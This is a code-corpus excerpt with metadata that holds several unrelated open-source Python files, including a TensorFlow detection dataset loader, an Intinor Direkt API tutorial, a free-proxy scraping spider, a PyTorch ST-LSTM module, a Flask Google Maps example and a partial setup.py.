detection_class_label: class label in numbers.
detection_bbox_ymin: ymin coordinates of a detection box.
detection_bbox_xmin: xmin coordinates of a detection box.
detection_bbox_ymax: ymax coordinates of a detection box.
detection_bbox_xmax: xmax coordinates of a detection box.
detection_score: detection score for the class label and box.
"""
image_encoded = 'image/encoded'
image_format = 'image/format' # format is reserved keyword
key = 'image/key/sha256'
filename = 'image/filename'
channels = 'image/channels'
colorspace = 'image/colorspace'
height = 'image/height'
width = 'image/width'
source_id = 'image/source_id'
image_class_text = 'image/class/text'
image_class_label = 'image/class/label'
image_class_synset = 'image/class/synset'
object_class_text = 'image/object/class/text'
object_class_label = 'image/object/class/label'
ignore_area_bbox_xmin = 'image/ignore_area/bbox/xmin'
ignore_area_bbox_ymin = 'image/ignore_area/bbox/ymin'
ignore_area_bbox_xmax = 'image/ignore_area/bbox/xmax'
ignore_area_bbox_ymax = 'image/ignore_area/bbox/ymax'
object_bbox_ymin = 'image/object/bbox/ymin'
object_bbox_xmin = 'image/object/bbox/xmin'
object_bbox_ymax = 'image/object/bbox/ymax'
object_bbox_xmax = 'image/object/bbox/xmax'
object_bbox_label = 'image/object/bbox/label'
object_bbox_split_line = 'image/object/bbox/vl'
object_bbox_split_type = 'image/object/bbox/vertical_line_type'
object_view = 'image/object/view'
object_truncated = 'image/object/truncated'
object_occluded = 'image/object/occluded'
object_difficult = 'image/object/difficult'
object_group_of = 'image/object/group_of'
object_depiction = 'image/object/depiction'
object_segment_area = 'image/object/segment/area'
object_weight = 'image/object/weight'
semseg_channels = 'image/segmentation/channels'
semseg_data = 'image/segmentation/data'
semseg_format = 'image/segmentation/format'
semseg_height = 'image/segmentation/height'
semseg_width = 'image/segmentation/width'
| 47.87574 | 109 | 0.707082 | from random import shuffle
import tensorflow as tf
from xcenternet.datasets.dataset import Dataset
class McodDataset(Dataset):
def __init__(self, dataset_path_tr, dataset_path_te, init_lr):
self.features = {
TfExampleFields.height: tf.io.FixedLenFeature((), dtype=tf.int64, default_value=1),
TfExampleFields.width: tf.io.FixedLenFeature((), dtype=tf.int64, default_value=1),
TfExampleFields.colorspace: tf.io.FixedLenFeature((), dtype=tf.string, default_value=''),
TfExampleFields.channels: tf.io.FixedLenFeature((), dtype=tf.int64, default_value=1),
TfExampleFields.image_class_label: tf.io.FixedLenFeature([], dtype=tf.int64, default_value=-1),
TfExampleFields.image_class_synset: tf.io.FixedLenFeature([], dtype=tf.string, default_value=''),
TfExampleFields.image_class_text: tf.io.FixedLenFeature([], dtype=tf.string, default_value=''),
TfExampleFields.object_bbox_ymin: tf.io.VarLenFeature(tf.float32),
TfExampleFields.object_bbox_xmin: tf.io.VarLenFeature(tf.float32),
TfExampleFields.object_bbox_ymax: tf.io.VarLenFeature(tf.float32),
TfExampleFields.object_bbox_xmax: tf.io.VarLenFeature(tf.float32),
TfExampleFields.image_format: tf.io.FixedLenFeature((), tf.string, default_value='jpeg'),
TfExampleFields.filename: tf.io.FixedLenFeature((), tf.string, default_value=''),
TfExampleFields.image_encoded: tf.io.FixedLenFeature((), tf.string, default_value=''),
}
num_classes = 9
self.path_train_set = dataset_path_tr
self.path_val_set = dataset_path_te
super().__init__(num_classes, init_lr)
def scheduler(self, epoch):
if epoch < 40:
return self.initial_learning_rate
elif epoch < 80:
return self.initial_learning_rate * 0.1
else:
return self.initial_learning_rate * 0.01
def decode(self, data):
"""Return a single image and associated label and bounding box
Copied from Modellbau
Args:
data: a string tensor holding a serialized protocol buffer corresponding
to data for a single image
Returns:
image: image tensor
label: class label tensor
bbox: bounding box comprising the annotated object
"""
par_feat = tf.io.parse_single_example(data, self.features)
image = tf.io.decode_image(par_feat[TfExampleFields.image_encoded], channels=3)
image.set_shape([None, None, 3])
object_bbox_xmin = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_xmin])
object_bbox_xmax = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_xmax])
object_bbox_ymin = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_ymin])
object_bbox_ymax = tf.sparse.to_dense(par_feat[TfExampleFields.object_bbox_ymax])
bbox = tf.stack([object_bbox_ymin, object_bbox_xmin, object_bbox_ymax, object_bbox_xmax], axis=-1)
label = par_feat[TfExampleFields.image_class_label]
# added by Xiao
image_id = par_feat[TfExampleFields.filename]
labels = tf.reshape(label, [-1])
bboxes = tf.reshape(bbox, [-1, 4])
return image, labels, bboxes, image_id
def _load_dataset(self, filenames, shuffle_tfrecords=True):
if shuffle_tfrecords:
shuffle(filenames)
ds = tf.data.TFRecordDataset(filenames)
return ds
def load_train_datasets(self):
dataset_train = self._load_dataset(filenames=self.path_train_set)
dataset_train_size = sum(1 for _ in dataset_train)
return dataset_train, dataset_train_size
def load_validation_datasets(self):
dataset_valid = self._load_dataset(filenames=self.path_val_set)
dataset_valid_size = sum(1 for _ in dataset_valid)
return dataset_valid, dataset_valid_size
class TfExampleFields(object):
"""TF-example proto feature names
Holds the standard feature names to load from an Example proto
Attributes:
image_encoded: image encoded as string
image_format: image format, e.g. "JPEG"
filename: filename
channels: number of channels of image
colorspace: colorspace, e.g. "RGB"
height: height of image in pixels, e.g. 462
width: width of image in pixels, e.g. 581
source_id: original source of the image
image_class_text: image-level label in text format
image_class_label: image-level label in numerical format
object_class_text: labels in text format, e.g. ["person", "cat"]
object_class_label: labels in numbers, e.g. [16, 8]
object_bbox_xmin: xmin coordinates of groundtruth box, e.g. 10, 30
object_bbox_xmax: xmax coordinates of groundtruth box, e.g. 50, 40
object_bbox_ymin: ymin coordinates of groundtruth box, e.g. 40, 50
object_bbox_ymax: ymax coordinates of groundtruth box, e.g. 80, 70
ignore_area_bbox_xmin: xmin coordinates of ignore box, e.g. 10, 30
ignore_area_bbox_xmax: xmax coordinates of ignore box, e.g. 50, 40
ignore_area_bbox_ymin: ymin coordinates of ignore box, e.g. 40, 50
ignore_area_bbox_ymax: ymax coordinates of ignore box, e.g. 80, 70
object_view: viewpoint of object, e.g. ["frontal", "left"]
object_truncated: is object truncated, e.g. [true, false]
object_occluded: is object occluded, e.g. [true, false]
object_difficult: is object difficult, e.g. [true, false]
object_group_of: is object a single object or a group of objects
object_depiction: is object a depiction
object_segment_area: the area of the segment.
object_weight: a weight factor for the object's bounding box.
instance_masks: instance segmentation masks.
instance_boundaries: instance boundaries.
instance_classes: Classes for each instance segmentation mask.
detection_class_label: class label in numbers.
detection_bbox_ymin: ymin coordinates of a detection box.
detection_bbox_xmin: xmin coordinates of a detection box.
detection_bbox_ymax: ymax coordinates of a detection box.
detection_bbox_xmax: xmax coordinates of a detection box.
detection_score: detection score for the class label and box.
"""
image_encoded = 'image/encoded'
image_format = 'image/format' # format is reserved keyword
key = 'image/key/sha256'
filename = 'image/filename'
channels = 'image/channels'
colorspace = 'image/colorspace'
height = 'image/height'
width = 'image/width'
source_id = 'image/source_id'
image_class_text = 'image/class/text'
image_class_label = 'image/class/label'
image_class_synset = 'image/class/synset'
object_class_text = 'image/object/class/text'
object_class_label = 'image/object/class/label'
ignore_area_bbox_xmin = 'image/ignore_area/bbox/xmin'
ignore_area_bbox_ymin = 'image/ignore_area/bbox/ymin'
ignore_area_bbox_xmax = 'image/ignore_area/bbox/xmax'
ignore_area_bbox_ymax = 'image/ignore_area/bbox/ymax'
object_bbox_ymin = 'image/object/bbox/ymin'
object_bbox_xmin = 'image/object/bbox/xmin'
object_bbox_ymax = 'image/object/bbox/ymax'
object_bbox_xmax = 'image/object/bbox/xmax'
object_bbox_label = 'image/object/bbox/label'
object_bbox_split_line = 'image/object/bbox/vl'
object_bbox_split_type = 'image/object/bbox/vertical_line_type'
object_view = 'image/object/view'
object_truncated = 'image/object/truncated'
object_occluded = 'image/object/occluded'
object_difficult = 'image/object/difficult'
object_group_of = 'image/object/group_of'
object_depiction = 'image/object/depiction'
object_segment_area = 'image/object/segment/area'
object_weight = 'image/object/weight'
semseg_channels = 'image/segmentation/channels'
semseg_data = 'image/segmentation/data'
semseg_format = 'image/segmentation/format'
semseg_height = 'image/segmentation/height'
semseg_width = 'image/segmentation/width'
| 2,335 | 1,500 | 23 |
db00ae2ea98be4abf7a161b404049c4e77de3c0b | 2,389 | py | Python | python_examples/example_01_basics_for_direkt_requests.py | intinor/direkt_api_tutorial | ecbc0f7366d275666f0b174041c7d20314c1db3c | [
"MIT"
] | 1 | 2022-03-08T13:35:11.000Z | 2022-03-08T13:35:11.000Z | python_examples/example_01_basics_for_direkt_requests.py | intinor/direkt_api_tutorial | ecbc0f7366d275666f0b174041c7d20314c1db3c | [
"MIT"
] | null | null | null | python_examples/example_01_basics_for_direkt_requests.py | intinor/direkt_api_tutorial | ecbc0f7366d275666f0b174041c7d20314c1db3c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Intinor Direkt API Python tutorial
Example 1: Send a request to a Direkt unit using the "direkt" module
and obtain API information as a JSON string
"""
import sys
# The "direkt" module wraps the "requests" library with some convenient
# functionality for the Intinor Direkt API.
import direkt
# START of configuration
# Replace the below example ID "D0****" with the ID of your Direkt unit to
# create the correct Direkt unit URL. This will point to the API root.
# Case-sensitive: Write the Direkt ID with a capital "D".
DIREKT_ID = "D0****"
# Assign "DIREKT_HOST" the hostname or IP address of your Direkt unit or
# "iss.intinor.com" if you want to send requests to the API through ISS.
DIREKT_HOST = "Hostname-or-IP-address"
# Replace username and password in the authentication below with the actual
# username and password for your Direkt unit or for your ISS account, if you
# assigned "DIREKT_HOST" with "iss.intinor.com".
AUTHENTICATION = ("username", "password")
# NOTES:
# Writing credentials into a script is not a secure practise but it makes a
# quick and easy start possible. Choose a more secure approach for usage beyond
# this tutorial.
# The default credentials for your Direkt unit can only be used through local
# network connections and we recommend changing them for security. This can be
# done in the unit's webinterface or in ISS.
# We recommend creating a shared API user account for your team.
# END of configuration
# The URL to the API root is created here. The API root is a good starting
# point resource which is available on all Direkt unit types.
URL = "https://" + DIREKT_HOST + "/api/v1/units/" + DIREKT_ID
def main():
"""Obtain the API resource"""
# Use a GET request to obtain the API resource.
response = direkt.get(URL, auth=AUTHENTICATION)
# Show the text property of the response, which is in JSON string format.
print(response.text)
if not response.ok:
sys.exit("GET '" + URL + "' failed.")
if __name__ == '__main__':
main()
# We recommend using the "direkt" module for API requests through local network
# connections and through ISS connections but alternatively it is possible to
# access the API without using the "direkt" module, in which case you import
# the "requests" library and connect through ISS.
# See Example 2 for more information.
| 32.283784 | 79 | 0.735036 | #!/usr/bin/env python3
"""Intinor Direkt API Python tutorial
Example 1: Send a request to a Direkt unit using the "direkt" module
and obtain API information as a JSON string
"""
import sys
# The "direkt" module wraps the "requests" library with some convenient
# functionality for the Intinor Direkt API.
import direkt
# START of configuration
# Replace the below example ID "D0****" with the ID of your Direkt unit to
# create the correct Direkt unit URL. This will point to the API root.
# Case-sensitive: Write the Direkt ID with a capital "D".
DIREKT_ID = "D0****"
# Assign "DIREKT_HOST" the hostname or IP address of your Direkt unit or
# "iss.intinor.com" if you want to send requests to the API through ISS.
DIREKT_HOST = "Hostname-or-IP-address"
# Replace username and password in the authentication below with the actual
# username and password for your Direkt unit or for your ISS account, if you
# assigned "DIREKT_HOST" with "iss.intinor.com".
AUTHENTICATION = ("username", "password")
# NOTES:
# Writing credentials into a script is not a secure practise but it makes a
# quick and easy start possible. Choose a more secure approach for usage beyond
# this tutorial.
# The default credentials for your Direkt unit can only be used through local
# network connections and we recommend changing them for security. This can be
# done in the unit's webinterface or in ISS.
# We recommend creating a shared API user account for your team.
# END of configuration
# The URL to the API root is created here. The API root is a good starting
# point resource which is available on all Direkt unit types.
URL = "https://" + DIREKT_HOST + "/api/v1/units/" + DIREKT_ID
def main():
"""Obtain the API resource"""
# Use a GET request to obtain the API resource.
response = direkt.get(URL, auth=AUTHENTICATION)
# Show the text property of the response, which is in JSON string format.
print(response.text)
if not response.ok:
sys.exit("GET '" + URL + "' failed.")
if __name__ == '__main__':
main()
# We recommend using the "direkt" module for API requests through local network
# connections and through ISS connections but alternatively it is possible to
# access the API without using the "direkt" module, in which case you import
# the "requests" library and connect through ISS.
# See Example 2 for more information.
| 0 | 0 | 0 |
e18ab7550d94b330264c78c211546ae6cac394fd | 2,519 | py | Python | hproxy/spider/proxy_spider/mimvp_spider.py | yejianxin2015/hproxy | f40266bf7b06368d3ebfdce8d60385bcd4b93713 | [
"MIT"
] | null | null | null | hproxy/spider/proxy_spider/mimvp_spider.py | yejianxin2015/hproxy | f40266bf7b06368d3ebfdce8d60385bcd4b93713 | [
"MIT"
] | null | null | null | hproxy/spider/proxy_spider/mimvp_spider.py | yejianxin2015/hproxy | f40266bf7b06368d3ebfdce8d60385bcd4b93713 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Created by howie.hu at 08/04/2018.
"""
import asyncio
import time
from hproxy.database import DatabaseSetting
from hproxy.spider.base_spider import ProxySpider
from hproxy.spider.proxy_spider import MimvpItem
from hproxy.spider.proxy_tools import request_url_by_aiohttp, get_proxy_info
db_client = DatabaseSetting()
class MimvpSpider(ProxySpider):
"""
Fetch proxies from https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page=1
"""
spider_name = 'mimvp'
item = MimvpItem
async def get_proxy(self):
"""
Fetch proxies from https://proxy.mimvp.com
:return:
"""
start = time.time()
tasks = []
for url in ['https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page={}'.format(i) for i in range(1, 64)]:
html = await request_url_by_aiohttp(url=url)
if html:
items_data = self.item.get_items(html=html)
for item_data in items_data:
if item_data.values:
tasks.append(asyncio.ensure_future(self.save_proxy(item_data.values)))
done_list, pending_list = await asyncio.wait(tasks)
good_nums = 0
for task in done_list:
if task.result():
good_nums += 1
self.logger.info(type="Spidering finished...",message="Crawling {0} finished,total proxy num : {1} - valid proxy num :{2},Time costs :{3}".format(
self.spider_name,
len(tasks),
good_nums,
time.time() - start))
async def save_proxy(self, ip_info):
"""
Save proxy
:param ip_info: (0.0.0.0, 8080)
:return:
"""
ip, port = ip_info
isOk, info = await get_proxy_info(ip, port, getInfo=True)
if isOk:
# Save proxy
try:
await db_client.insert(field="{0}:{1}".format(ip, port), value=info)
self.logger.info(type='Valid proxy', message="{0}: {1}:{2} had been saved".format(self.spider_name, ip, port))
return True
except Exception as e:
self.logger.info(type='Invalid proxy', message="{0}: {1}:{2} had been abandoned".format(self.spider_name, ip, port))
return False
return False
async def start():
"""
Start spider
:return:
"""
await MimvpItem.start()
if __name__ == '__main__':
# Start
asyncio.get_event_loop().run_until_complete(start())
| 29.988095 | 155 | 0.588329 | #!/usr/bin/env python
"""
Created by howie.hu at 08/04/2018.
"""
import asyncio
import time
from hproxy.database import DatabaseSetting
from hproxy.spider.base_spider import ProxySpider
from hproxy.spider.proxy_spider import MimvpItem
from hproxy.spider.proxy_tools import request_url_by_aiohttp, get_proxy_info
db_client = DatabaseSetting()
class MimvpSpider(ProxySpider):
"""
Fetch proxies from https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page=1
"""
spider_name = 'mimvp'
item = MimvpItem
async def get_proxy(self):
"""
Fetch proxies from https://proxy.mimvp.com
:return:
"""
start = time.time()
tasks = []
for url in ['https://proxy.mimvp.com/free.php?proxy=in_hp&sort=&page={}'.format(i) for i in range(1, 64)]:
html = await request_url_by_aiohttp(url=url)
if html:
items_data = self.item.get_items(html=html)
for item_data in items_data:
if item_data.values:
tasks.append(asyncio.ensure_future(self.save_proxy(item_data.values)))
done_list, pending_list = await asyncio.wait(tasks)
good_nums = 0
for task in done_list:
if task.result():
good_nums += 1
self.logger.info(type="Spidering finished...",message="Crawling {0} finished,total proxy num : {1} - valid proxy num :{2},Time costs :{3}".format(
self.spider_name,
len(tasks),
good_nums,
time.time() - start))
async def save_proxy(self, ip_info):
"""
Save proxy
:param ip_info: (0.0.0.0, 8080)
:return:
"""
ip, port = ip_info
isOk, info = await get_proxy_info(ip, port, getInfo=True)
if isOk:
# Save proxy
try:
await db_client.insert(field="{0}:{1}".format(ip, port), value=info)
self.logger.info(type='Valid proxy', message="{0}: {1}:{2} had been saved".format(self.spider_name, ip, port))
return True
except Exception as e:
self.logger.info(type='Invalid proxy', message="{0}: {1}:{2} had been abandoned".format(self.spider_name, ip, port))
return False
return False
async def start():
"""
Start spider
:return:
"""
await MimvpItem.start()
if __name__ == '__main__':
# Start
asyncio.get_event_loop().run_until_complete(start())
| 0 | 0 | 0 |
7fef8222041c4acd1301c7154532629ffd87de23 | 562 | py | Python | server/src/util.py | Opportunity-Hack-2015-Arizona/Team1 | 49b432d1e1bfae90551967f796338cfb9da6a89d | [
"MIT"
] | 1 | 2015-10-11T05:33:44.000Z | 2015-10-11T05:33:44.000Z | server/src/util.py | Opportunity-Hack-2015-Arizona/Team1 | 49b432d1e1bfae90551967f796338cfb9da6a89d | [
"MIT"
] | null | null | null | server/src/util.py | Opportunity-Hack-2015-Arizona/Team1 | 49b432d1e1bfae90551967f796338cfb9da6a89d | [
"MIT"
] | null | null | null | from functools import wraps
from flask import request
| 24.434783 | 101 | 0.622776 | from functools import wraps
from flask import request
def authenticate(func):
@wraps(func)
def auth_call(*args, **kwargs):
if request.json: # TODO STEVE IMPLEMENT AUTH (Auth currently based on request.json existing)
return func(*args, **kwargs)
else:
return "Authentication Failed", 401
return auth_call
def validate(obj, *args):
args = set(args)
errors = ()
for required in args:
if required not in obj:
errors = errors + ((required + " is required"),)
return errors
| 460 | 0 | 46 |
de03dc6cbce490d45e09e58f380fdbd937ffe590 | 1,966 | py | Python | releng/lib/__init__.py | imoisharma/emissary | 5346ccb06673827a6a2e51ddaf92925f60bd9de9 | [
"Apache-2.0"
] | null | null | null | releng/lib/__init__.py | imoisharma/emissary | 5346ccb06673827a6a2e51ddaf92925f60bd9de9 | [
"Apache-2.0"
] | null | null | null | releng/lib/__init__.py | imoisharma/emissary | 5346ccb06673827a6a2e51ddaf92925f60bd9de9 | [
"Apache-2.0"
] | 1 | 2021-03-04T10:23:33.000Z | 2021-03-04T10:23:33.000Z | #!/hint/python3
import re
import subprocess
from typing import Any, List
from os import getenv
import subprocess
from .gitutil import git_check_clean as git_check_clean # Stop mypy complaining about implicit reexport
from .uiutil import run_txtcapture
from .gitutil import git_add as git_add # Stop mypy complaining about implicit reexport
# These are some regular expressions to validate and parse
# X.Y.Z[-rc.N] versions.
re_rc = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-rc\.([0-9]+)$')
re_ga = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)$')
re_ea = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-ea$')
vX = 1
vY = 2
vZ = 3
vN = 4
DEFAULT_REPO = "emissary-ingress/emissary"
def base_version(release_version: str) -> str:
"""Given 'X.Y.Z[-rc.N]', return 'X.Y'."""
return build_version(release_version).rsplit(sep='.', maxsplit=1)[0]
def build_version(release_version: str) -> str:
"""Given 'X.Y.Z[-rc.N]', return 'X.Y.Z'."""
return release_version.split('-')[0]
def assert_eq(actual: Any, expected: Any) -> None:
"""`assert_eq(a, b)` is like `assert a == b`, but has a useful error
message when they're not equal.
"""
if actual != expected:
raise AssertionError(f"wanted '{expected}', got '{actual}'")
def get_is_private() -> bool:
"""Return whether we're in a "private" Git checkout, for doing
embargoed work.
"""
remote_names = run_txtcapture(['git', 'remote']).split()
remote_urls: List[str] = []
for remote_name in remote_names:
remote_urls += run_txtcapture(['git', 'remote', 'get-url', '--all', remote_name]).split()
return 'private' in "\n".join(remote_urls)
| 31.709677 | 104 | 0.639369 | #!/hint/python3
import re
import subprocess
from typing import Any, List
from os import getenv
import subprocess
from .gitutil import git_check_clean as git_check_clean # Stop mypy complaining about implicit reexport
from .uiutil import run_txtcapture
from .gitutil import git_add as git_add # Stop mypy complaining about implicit reexport
# These are some regular expressions to validate and parse
# X.Y.Z[-rc.N] versions.
re_rc = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-rc\.([0-9]+)$')
re_ga = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)$')
re_ea = re.compile(r'^([0-9]+)\.([0-9]+)\.([0-9]+)-ea$')
vX = 1
vY = 2
vZ = 3
vN = 4
DEFAULT_REPO = "emissary-ingress/emissary"
def base_version(release_version: str) -> str:
"""Given 'X.Y.Z[-rc.N]', return 'X.Y'."""
return build_version(release_version).rsplit(sep='.', maxsplit=1)[0]
def build_version(release_version: str) -> str:
"""Given 'X.Y.Z[-rc.N]', return 'X.Y.Z'."""
return release_version.split('-')[0]
def assert_eq(actual: Any, expected: Any) -> None:
"""`assert_eq(a, b)` is like `assert a == b`, but has a useful error
message when they're not equal.
"""
if actual != expected:
raise AssertionError(f"wanted '{expected}', got '{actual}'")
def get_is_private() -> bool:
"""Return whether we're in a "private" Git checkout, for doing
embargoed work.
"""
remote_names = run_txtcapture(['git', 'remote']).split()
remote_urls: List[str] = []
for remote_name in remote_names:
remote_urls += run_txtcapture(['git', 'remote', 'get-url', '--all', remote_name]).split()
return 'private' in "\n".join(remote_urls)
def get_gh_repo() -> str:
remote_url = run_txtcapture(['git', 'remote', 'get-url', 'origin']).strip()
re_repo = re.compile(r'github\.com[:\/]([a-z\d-]+\/[a-z]+)(\.git)?$')
m = re_repo.search(remote_url)
if not m:
raise Exception(f"Could not find repo from {remote_url}")
return m[1]
| 289 | 0 | 23 |
5e76824fe09b1da67ef92de0f20913bbf09df805 | 4,471 | py | Python | pioneer/core/STLSTM.py | TJUMMG/TGSR | 41a36c4fa1154bdc47bb48dbe97e8e8090294ce2 | [
"Apache-2.0"
] | null | null | null | pioneer/core/STLSTM.py | TJUMMG/TGSR | 41a36c4fa1154bdc47bb48dbe97e8e8090294ce2 | [
"Apache-2.0"
] | null | null | null | pioneer/core/STLSTM.py | TJUMMG/TGSR | 41a36c4fa1154bdc47bb48dbe97e8e8090294ce2 | [
"Apache-2.0"
] | 1 | 2022-02-24T23:40:44.000Z | 2022-02-24T23:40:44.000Z | import torch
import torch.nn as nn
if __name__ == '__main__':
batchsize =10
# stlstm_cell = STLSTMCell(4, 10)
# x = torch.randn([1, 4])
# h = torch.randn([1, 10])
# c = torch.randn([1, 10])
# m = torch.randn([1, 10])
#
# h_t, c_t, m_t = stlstm_cell(x, h, c, m)
stlstm = STLSTM(4, 10, 2, batchsize)
# stlstm.cuda()
x = torch.randn([batchsize, 7, 4])
a = stlstm(x)
a =1
| 35.768 | 123 | 0.561619 | import torch
import torch.nn as nn
class STLSTMCell(nn.Module):
def __init__(self,input_size, hidden_size):
super(STLSTMCell, self).__init__()
self.conv_x = nn.Linear(input_size,hidden_size*7)
self.conv_h = nn.Linear(hidden_size,hidden_size*4)
self.conv_m = nn.Linear(hidden_size,hidden_size*3)
self.conv_o = nn.Linear(hidden_size*2,hidden_size)
self.conv_last = nn.Linear(hidden_size * 2, hidden_size)
self.hidden_size = hidden_size
def forward(self, input, hidden_state, cell_state, memory_state):
# input [batch, input_size]
x_concat = self.conv_x(input)
h_concat = self.conv_h(hidden_state)
m_concat = self.conv_m(memory_state)
i_x, f_x, g_x, i_x_prime, f_x_prime, g_x_prime, o_x = torch.split(x_concat, self.hidden_size, dim=1)
i_h, f_h, g_h, o_h = torch.split(h_concat, self.hidden_size, dim=1)
i_m, f_m, g_m = torch.split(m_concat, self.hidden_size, dim=1)
i_t = torch.sigmoid(i_x + i_h)
f_t = torch.sigmoid(f_x + f_h)
g_t = torch.tanh(g_x + g_h)
c_t = f_t * cell_state + i_t * g_t
i_t_m = torch.sigmoid(i_x + i_m)
f_t_m = torch.sigmoid(f_x + f_m)
g_t_m = torch.tanh(g_x + g_m)
m_t = f_t_m * memory_state + i_t_m * g_t_m
mem = torch.cat((c_t, m_t), -1)
o_t = torch.sigmoid(o_x + o_h + self.conv_o(mem))
h_t = o_t * torch.tanh(self.conv_last(mem))
return h_t, c_t, m_t
class STLSTM(nn.Module):
def __init__(self,input_size, hidden_size, num_layer, batchsize):
super(STLSTM, self).__init__()
# 构建网络层
self.num_layer = num_layer
cell_list=[]
cell_list.append(STLSTMCell(input_size, hidden_size))
for i in range(num_layer-1):
cell_list.append(STLSTMCell(hidden_size,hidden_size))
self.cell_list = nn.ModuleList(cell_list)
self.hidden_state = torch.zeros(batchsize, hidden_size)
self.cell_state = torch.zeros(batchsize, hidden_size)
self.memory_state = torch.zeros(batchsize, hidden_size)
def forward(self, inputs):
device = inputs.device
self.hidden_state = self.hidden_state.to(device=device)
self.cell_state = self.cell_state.to(device=device)
self.memory_state = self.memory_state.to(device=device)
# 原方案使用对self.hidden_state循环赋值,可以测试,但无法训练
h0 = [self.hidden_state[:, :]]
h1 = [self.hidden_state[:, :]]
c0 = [self.cell_state[:, :]]
c1 = [self.cell_state[:, :]]
m = [self.memory_state]
for seq in range(inputs.shape[1]):
input = inputs[:, seq, :]
# 对单个输入的计算input[batch,seq_len,input_size]
for i in range(self.num_layer):
if i == 0:
a,b,x = \
self.cell_list[i](input, h0[-1], c0[-1], m[-1])
h0.append(a), c0.append(b), m.append(x)
else:
a,b,x = \
self.cell_list[i](h0[-1], h1[-1], c1[-1], m[-1])
h1.append(a), c1.append(b), m.append(x)
return h1[-1], c1[-1], m[-1]
def forward_(self, inputs):
# 原方案
for seq in range(inputs.shape[1]):
input = inputs[:, seq, :]
# 对单个输入的计算input[batch,seq_len,input_size]
for i in range(self.num_layer):
if i == 0:
self.hidden_state[:, i, :], self.cell_state[:, i, :], self.memory_state = \
self.cell_list[i](input, self.hidden_state[:, i, :], self.cell_state[:, i, :],
self.memory_state)
else:
self.hidden_state[:, i, :], self.cell_state[:, i, :], self.memory_state = \
self.cell_list[i](self.hidden_state[:, i, :], self.hidden_state[:, i, :], self.cell_state[:, i, :],
self.memory_state)
return self.hidden_state, self.cell_state, self.memory_state
if __name__ == '__main__':
batchsize =10
# stlstm_cell = STLSTMCell(4, 10)
# x = torch.randn([1, 4])
# h = torch.randn([1, 10])
# c = torch.randn([1, 10])
# m = torch.randn([1, 10])
#
# h_t, c_t, m_t = stlstm_cell(x, h, c, m)
stlstm = STLSTM(4, 10, 2, batchsize)
# stlstm.cuda()
x = torch.randn([batchsize, 7, 4])
a = stlstm(x)
a =1
| 3,943 | 10 | 179 |
d4ccb23fa768b7c5845523c071cba747ce1fbe83 | 678 | py | Python | examples/simple.py | fabricio-aguiar/Flask-GoogleMaps | 57fbad142723dcae512c41a3b8a4a3e34aaa2c40 | [
"MIT"
] | null | null | null | examples/simple.py | fabricio-aguiar/Flask-GoogleMaps | 57fbad142723dcae512c41a3b8a4a3e34aaa2c40 | [
"MIT"
] | null | null | null | examples/simple.py | fabricio-aguiar/Flask-GoogleMaps | 57fbad142723dcae512c41a3b8a4a3e34aaa2c40 | [
"MIT"
] | null | null | null | from flask import Flask, render_template
from flask_googlemaps import GoogleMaps, Map, icons
from dynaconf import FlaskDynaconf
app = Flask(__name__)
GoogleMaps(app)
FlaskDynaconf(app)
@app.route("/")
if __name__ == "__main__":
app.run(port=5050)
| 22.6 | 75 | 0.623894 | from flask import Flask, render_template
from flask_googlemaps import GoogleMaps, Map, icons
from dynaconf import FlaskDynaconf
app = Flask(__name__)
GoogleMaps(app)
FlaskDynaconf(app)
@app.route("/")
def map_created_in_view():
gmap = Map(
identifier="gmap",
varname="gmap",
lat=37.4419,
lng=-122.1419,
markers={
icons.dots.green: [(37.4419, -122.1419), (37.4500, -122.1350)],
icons.dots.blue: [(37.4300, -122.1400, "Hello World")]
},
style="height:400px;width:600px;margin:0;"
)
return render_template("simple.html", gmap=gmap)
if __name__ == "__main__":
app.run(port=5050)
| 400 | 0 | 22 |
e08fef1717dba2d5e1844755508084fbe4b923d4 | 2,301 | py | Python | setup.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | [
"BSD-3-Clause"
] | 7 | 2021-07-07T09:55:20.000Z | 2022-01-22T06:34:17.000Z | setup.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | [
"BSD-3-Clause"
] | 16 | 2021-06-09T06:28:27.000Z | 2022-03-01T18:12:33.000Z | setup.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | [
"BSD-3-Clause"
] | 1 | 2020-01-03T17:04:16.000Z | 2020-01-03T17:04:16.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import find_packages
from setuptools import setup
# Load package veersion number.
with open("csdmpy/__init__.py", "r") as f:
for line in f.readlines():
if "__version__" in line:
before_keyword, keyword, after_keyword = line.partition("=")
version = after_keyword.strip()[1:-1]
# What packages are required for this module to be executed?
required = [
"numpy>=1.17",
"setuptools>=27.3",
"astropy>=3.0",
"requests>=2.21.0",
"numexpr>=2.7.0",
]
extras = {"matplotlib": ["matplotlib>=3.0"]}
setup_requires = ["setuptools>=27.3"]
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with open(os.path.join(here, "README.md"), encoding="utf-8") as f:
long_description = "\n" + f.read()
except FileNotFoundError:
long_description = ""
setup(
name="csdmpy",
version=version,
description="A python module for the core scientific dataset model.",
long_description=long_description,
long_description_content_type="text/markdown",
author="Deepansh Srivastava",
author_email="srivastava.89@osu.edu",
python_requires=">=3.6",
url="https://github.com/DeepanshS/csdmpy/",
packages=find_packages(),
install_requires=required,
setup_requires=setup_requires,
extras_require=extras,
tests_require=["pytest", "pytest-runner"],
include_package_data=True,
license="BSD-3-Clause",
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
